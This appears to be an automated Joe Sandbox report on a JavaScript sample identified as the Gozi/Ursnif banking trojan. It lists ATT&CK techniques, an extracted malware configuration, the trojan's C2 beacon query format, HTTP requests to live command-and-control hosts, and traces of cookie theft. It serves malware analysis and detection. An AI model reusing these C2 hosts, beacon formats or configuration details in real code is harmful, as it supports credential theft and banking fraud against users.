Loading ...

Play interactive tourEdit tour

Analysis Report open_attach_n2k.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224571
Start date:22.04.2020
Start time:20:17:30
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 40s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:open_attach_n2k.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 5.7% (good quality ratio 5.3%)
  • Quality average: 77.6%
  • Quality standard deviation: 28.6%
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 68
  • Number of non-executed functions: 211
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, ielowutil.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 8.248.141.254, 67.26.75.254, 8.253.207.120, 67.26.137.254, 67.26.139.254, 72.247.224.69, 104.79.117.49, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5404 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Gozi Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Scripting12Credential DumpingSystem Time Discovery1Remote File Copy3Email Collection1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell1Port MonitorsAccess Token Manipulation1Obfuscated Files or Information2Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting12Accessibility FeaturesProcess Injection413Masquerading11Input CaptureFile and Directory Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API1System FirmwareDLL Search Order HijackingValid Accounts1Credentials in FilesSystem Information Discovery45Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion2Account ManipulationVirtualization/Sandbox Evasion2Shared WebrootData StagedScheduled TransferConnection Proxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceAccess Token Manipulation1Brute ForceProcess Discovery3Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface12Path InterceptionScheduled TaskProcess Injection413Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessConnection Proxy1Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.3660.3.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "404", "system": "96ab1502108db75b005f32e9fdb6fa37hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587579570", "user": "b0e80f0d54c8a3b79c4b2eb5591a3ea3", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: f1.pipen.atVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: open_attach_n2k.jsVirustotal: Detection: 25%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txtJoe Sandbox ML: detected

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0506CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_0507940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05068181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05068181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05077CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05077CDC

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmpString found in binary or memory: %wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/R1NJU94g4N/wxb9_2BTUmytHmlRp/DyOC4pGYtn71/VKpppweKVls/He_2BFZ3z9GdDj/MJ0eK3qnN7oV9up_2FdGD/EhrAIP0h8_2BexLC/9_2FKO8CDYMS5Qr/srBK9D1_2FY8n6zcMJ/C_2Fr6Xw8/lky1riXRkBzWOeAcP0w0/Gp_2BvsVBDl3A7hBzed/GL8_2FQ_2BdZEhbEncOIXV/r2Sm9iD95dRNe/Fj7eH618/2vnPhwfoDqXBj8ipFJpQLng/9LFEAV_2BE/2X88IgU6xj_2BKMZ9/1_0A_0DWT5az/_2FqBxB7vZO/S2uYdjcsIn5c5k/3v_2FtjEGqD/_2FkGXFH/Sgzr HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/l0mTpJmtYNx_2FHoXqv/h0B17aaM7uO1kLzMTeiaKj/hMue4W18FnswJ/pFZCIyPa/_2B3qH1zExISkLPu8Yn0xPa/PMCTZ_2F4P/xXUio3WfxELMS0u7I/xZn6PsaqWInq/uXwH882hVN0/0DY76GPw9EQYhi/8xV1QI1gTC1VTtDA4nL4Q/SnXZvNTwEC44L5QG/peHFwijSOHGp5dl/nbMK6ukjZlFT0S7P7m/c2gAxLP6p/dw55hQ9BUr0XjRjWinOD/4P1NtTvMM9_0A_0D6q2/Sf1u_2B9aB8ZRp6y33P63S/CXearhDR81dZW/SpbNWD3S/ZBhBjV8CwFqFIyj4qrR15Dd/r HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxmum/XWCzESfD0GEF4/Qjx5aw51/G3fgrbAK8jrnIdMeRkz1f3I/vFKx_2FN1E/_2FtGaz62dC02Cddz/RaPqDvZTx_2B/awvst0R17dZ/0GfbzNl2n3qF9L/E7z046Msr_2BJT7rA_2FD/A8GGcdT9WzqgNb7z/BNY39tuIwWJYXDY/hGC0yZivJk9AmDj5Xd/CtOHNb0TO/Uk_2BZyKMemjBoc_0A_0/D4iJROIwC22J8Lo_2FC/D_2B62mE_2FFLXf4zekfTe/pVtfNYg5dNL_2/Bty160ii/60zh3n_2Byaa/vvL1S HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Found strings which match to known social media urlsShow sources
Source: msapplication.xml0.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa232f56d,0x01d618d2</date><accdate>0xa232f56d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa232f56d,0x01d618d2</date><accdate>0xa2357e00,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa2427468,0x01d618d2</date><accdate>0xa2427468,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa2427468,0x01d618d2</date><accdate>0xa2427468,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa244fd5d,0x01d618d2</date><accdate>0xa244fd5d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.6.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa244fd5d,0x01d618d2</date><accdate>0xa244fd5d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Apr 2020 18:19:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary dataShow sources
Source: regsvr32.exe, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxm
Source: regsvr32.exe, 00000003.00000003.1410030358.00000000001A2000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.1407600605.0000000000193000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxmum/XW
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.6.drString found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.6.drString found in binary or memory: http://www.google.com/
Source: msapplication.xml2.6.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml3.6.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.6.drString found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.6.drString found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.6.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.6.drString found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff3_2_0507FB8F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie3_2_0507FB8F
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72721652 NtMapViewOfSection,3_2_72721652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7272113E GetProcAddress,NtCreateSection,memset,3_2_7272113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72722765 NtQueryVirtualMemory,3_2_72722765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050675B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_050675B3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05065CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_05065CD8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0506476B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506668C NtMapViewOfSection,3_2_0506668C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,3_2_0507CEA7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05080170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_05080170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_0507A395
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050793CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_050793CD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05078A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_05078A30
